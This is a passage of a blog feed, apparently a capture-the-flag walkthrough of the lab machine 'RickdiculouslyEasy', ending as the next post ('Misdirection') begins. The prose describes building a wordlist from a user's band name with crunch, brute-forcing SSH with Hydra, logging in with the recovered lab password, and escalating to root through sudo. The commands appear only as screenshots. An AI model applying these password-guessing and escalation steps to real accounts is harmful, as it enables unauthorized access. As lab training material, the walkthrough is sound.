/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOxO2ACiNbzJfw8Nlp5MtOR1jMGz3HMhfNOou2SCUXnUM0pb3SxA1oJRqMMGQCNud1mQ0-hqwalaSJYnrzS1aFG73jfwi3eymK1sF6DsgNvnkOKNWPUbyNU0vK42iIfuxzi8HAQLOIgH44/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;579&quot; data-original-width=&quot;741&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOxO2ACiNbzJfw8Nlp5MtOR1jMGz3HMhfNOou2SCUXnUM0pb3SxA1oJRqMMGQCNud1mQ0-hqwalaSJYnrzS1aFG73jfwi3eymK1sF6DsgNvnkOKNWPUbyNU0vK42iIfuxzi8HAQLOIgH44/s16000/screenshot.71.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So let&#39;s try to apply hints found before for&amp;nbsp;&lt;b&gt;RickSanchez&lt;/b&gt;&#39;s password:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbIohG4GNfXkt4B11QVfgXqZzMCbk54wKPeBknWJtMxaOyf7ORoGI1a_M_c4Fl0BTnwNmmVhilWUrSQn78-onB-C92HGjY2wx37nYBd-0YSEbd0wlXu5aHifkS99aooAuk9nq_2TUucrZu/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;247&quot; data-original-width=&quot;928&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbIohG4GNfXkt4B11QVfgXqZzMCbk54wKPeBknWJtMxaOyf7ORoGI1a_M_c4Fl0BTnwNmmVhilWUrSQn78-onB-C92HGjY2wx37nYBd-0YSEbd0wlXu5aHifkS99aooAuk9nq_2TUucrZu/s16000/screenshot.90.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- First of all, we are able to find information about &lt;b&gt;RickSanchez&lt;/b&gt;&#39;s band just by using Google:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhefQdfE3jJqC10csIw_3Qms9juu2dcfTTiO1xsfoRgRbhs_cfzBX79m-EutXAMGGXoMBNDqe3lOafWdoDjhE_8pIVgu3Bka-2INIYsyuWdAmDQt265ZR-NbP2H3Ub9IcjsVVGwZeX_wj8V/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;410&quot; data-original-width=&quot;814&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhefQdfE3jJqC10csIw_3Qms9juu2dcfTTiO1xsfoRgRbhs_cfzBX79m-EutXAMGGXoMBNDqe3lOafWdoDjhE_8pIVgu3Bka-2INIYsyuWdAmDQt265ZR-NbP2H3Ub9IcjsVVGwZeX_wj8V/s16000/screenshot.76.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3K5J-3MPt5if6ELnmtvsQB1q8b-p5yZOsklRWkhEsQGJaCBhyBw243NgsOoi_hw7xbXWgv9UOnOnoN_Aan7EZxELHlo81N3UHV7vJRtj6UdYNCW6EzmxMgcKb4VOOq5s48pwczPAuCPG9/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;444&quot; data-original-width=&quot;694&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3K5J-3MPt5if6ELnmtvsQB1q8b-p5yZOsklRWkhEsQGJaCBhyBw243NgsOoi_hw7xbXWgv9UOnOnoN_Aan7EZxELHlo81N3UHV7vJRtj6UdYNCW6EzmxMgcKb4VOOq5s48pwczPAuCPG9/s16000/screenshot.77.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;span style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;text-align: left;&quot;&gt;- Now, taking the 3 words of the band (The, Flesh, Curtains), and applying &lt;/span&gt;&lt;b style=&quot;text-align: left;&quot;&gt;crunch&lt;/b&gt;&lt;span style=&quot;text-align: left;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZxjtyubv44KT5YCSEbX80tprLLzjm6HmvM9BQ5Rs_gfWcvbUaLj8FmRxCBKHs2qMRRHXvLPjh658jQ9stD_bt445wyFqOgLEw40rskncv4-tYYbwE_b9ERcPtGZv8PZKrYX1hqzFo5oG9/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;624&quot; data-original-width=&quot;740&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZxjtyubv44KT5YCSEbX80tprLLzjm6HmvM9BQ5Rs_gfWcvbUaLj8FmRxCBKHs2qMRRHXvLPjh658jQ9stD_bt445wyFqOgLEw40rskncv4-tYYbwE_b9ERcPtGZv8PZKrYX1hqzFo5oG9/s16000/screenshot.72.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Joining the three files into one:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtVp4K3B0WYT6w8mXNvRBdA7vT0k-rjyQ8lneIvhvWF4C-yDIWJp14EuL-rWC3JD4PidUlwMvzKxiGIngo_cAWng6eXgrqzqaWJAvsuaGXSUu1fiFpldMzk9nZScQCE-COPeteusYHQMPt/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;598&quot; data-original-width=&quot;559&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtVp4K3B0WYT6w8mXNvRBdA7vT0k-rjyQ8lneIvhvWF4C-yDIWJp14EuL-rWC3JD4PidUlwMvzKxiGIngo_cAWng6eXgrqzqaWJAvsuaGXSUu1fiFpldMzk9nZScQCE-COPeteusYHQMPt/s16000/screenshot.84.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Applying &lt;b&gt;Hydra&lt;/b&gt; to user &lt;b&gt;RickSanchez&lt;/b&gt; and passing &lt;b&gt;ps.txt&lt;/b&gt; for passwords at port SSH 22222, we find the new password &lt;b&gt;P7Curtains&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVc6reJuz8xD15gfK7VbhAyanNaxYipHmfLQKEYQME5yGepCNcgtaKbhIhcGKcXvAQDRoywyKbcvFBffavbNgHYM2UW_5_M3TdNC4LRH5HtG4oSezb4Dqc8_stgj_WV6RPvJmBXVkgC-ZP/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;184&quot; data-original-width=&quot;888&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVc6reJuz8xD15gfK7VbhAyanNaxYipHmfLQKEYQME5yGepCNcgtaKbhIhcGKcXvAQDRoywyKbcvFBffavbNgHYM2UW_5_M3TdNC4LRH5HtG4oSezb4Dqc8_stgj_WV6RPvJmBXVkgC-ZP/s16000/screenshot.85.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- SSH-ing with credentials &lt;b&gt;RickSanchez:P7Curtains&lt;/b&gt; is succesful:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioQ9VTEpxB3mE80x2ZUsrTem0T4rx8ybYtyVi4V1S7tNEndKQe6EKqIFLehVail5D9RtSk1Zj5NpTKxLX3VUUVctefnMCJDLU6MyaG7-wJk3PSxkJrmecVuW2aV3RV8jxsCirOKn5PbX9z/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;161&quot; data-original-width=&quot;866&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioQ9VTEpxB3mE80x2ZUsrTem0T4rx8ybYtyVi4V1S7tNEndKQe6EKqIFLehVail5D9RtSk1Zj5NpTKxLX3VUUVctefnMCJDLU6MyaG7-wJk3PSxkJrmecVuW2aV3RV8jxsCirOKn5PbX9z/s16000/screenshot.79.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- It happens that user &lt;b&gt;RickSanchez&lt;/b&gt; has (ALL)ALL sudoer privileges:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgje5fZHSRbUn4TodmuKoZiBa7varDvC_pYk8Z32kf5C6EslEVUCfII1u2LCi9VjL7CNjGQJahf-G6uTe1dbCVDSoeUv6eTi-dxq9uMjTnmZ6vIFl-30mMOrrSJ2MTr_ljyW5oTKe3z5ZbU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;207&quot; data-original-width=&quot;690&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgje5fZHSRbUn4TodmuKoZiBa7varDvC_pYk8Z32kf5C6EslEVUCfII1u2LCi9VjL7CNjGQJahf-G6uTe1dbCVDSoeUv6eTi-dxq9uMjTnmZ6vIFl-30mMOrrSJ2MTr_ljyW5oTKe3z5ZbU/s16000/screenshot.80.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting a root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSory3oBITPJezXMXCTLeoI9S_X_PpvPLBmF522ozGMPocPWlIZwVeOB9KOGjxpi13pUCBhNbCkfbx_zqztlKDO22Wuk5qu2fk4_zg1LVmU5rCaVL6-INt8JqeL7Za4kuCqm12HDEGE1y5/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;73&quot; data-original-width=&quot;420&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSory3oBITPJezXMXCTLeoI9S_X_PpvPLBmF522ozGMPocPWlIZwVeOB9KOGjxpi13pUCBhNbCkfbx_zqztlKDO22Wuk5qu2fk4_zg1LVmU5rCaVL6-INt8JqeL7Za4kuCqm12HDEGE1y5/s16000/screenshot.81.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading the last 30 points&lt;b&gt; FLAG (130/130)&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixr0gU7g0WAcELsOl9_uEOg5vkLbhP0R7I5ujLPYQ43HEDloPo451QSWmfirYHarDP2HRSmgSA6v9kRHU7KtNabDUvMClVKcCzW1lEoCQfE3lW27u4Xx-U_I_0ydksTM5urpU-91rPHLP_/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;484&quot; data-original-width=&quot;477&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixr0gU7g0WAcELsOl9_uEOg5vkLbhP0R7I5ujLPYQ43HEDloPo451QSWmfirYHarDP2HRSmgSA6v9kRHU7KtNabDUvMClVKcCzW1lEoCQfE3lW27u4Xx-U_I_0ydksTM5urpU-91rPHLP_/s16000/screenshot.82.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/737254483528879923'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/737254483528879923'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/01/rickdiculouslyeasy.html' title='RickdiculouslyEasy'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe-Vz9QnPYffWPnE27RN905vk-WsmmpRAnEsMAGZhZFrqP55uK3ZdT9-rLlnlDBRegd23uU-wWp2gCmJn9R3m4GQnbYvjpYrdikCCgBZzaGbrPSbtfLqmI4ZVgbNTmUV7FskwXloHeJEX9/s72-c/screenshot.88.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-6168209329600246029</id><published>2022-01-14T13:28:00.000-06:00</published><updated>2022-01-14T13:28:04.046-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Misdirection</title><content type='html'>&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;MISDIRECTION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGZCOYzSZwGQ4YD-tvLhQy04LTTSlWq5sAVr5O6vp9t8cC37T53CZMYfrjZ3sRt_JRi6cKklJbsNvWwf3pE5TCCz9GHyXny43LF01a8l2rS46jSq5PKMTaBEl4hVYlbV1tGoapwu_6PGZk/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;241&quot; data-original-width=&quot;663&quot; 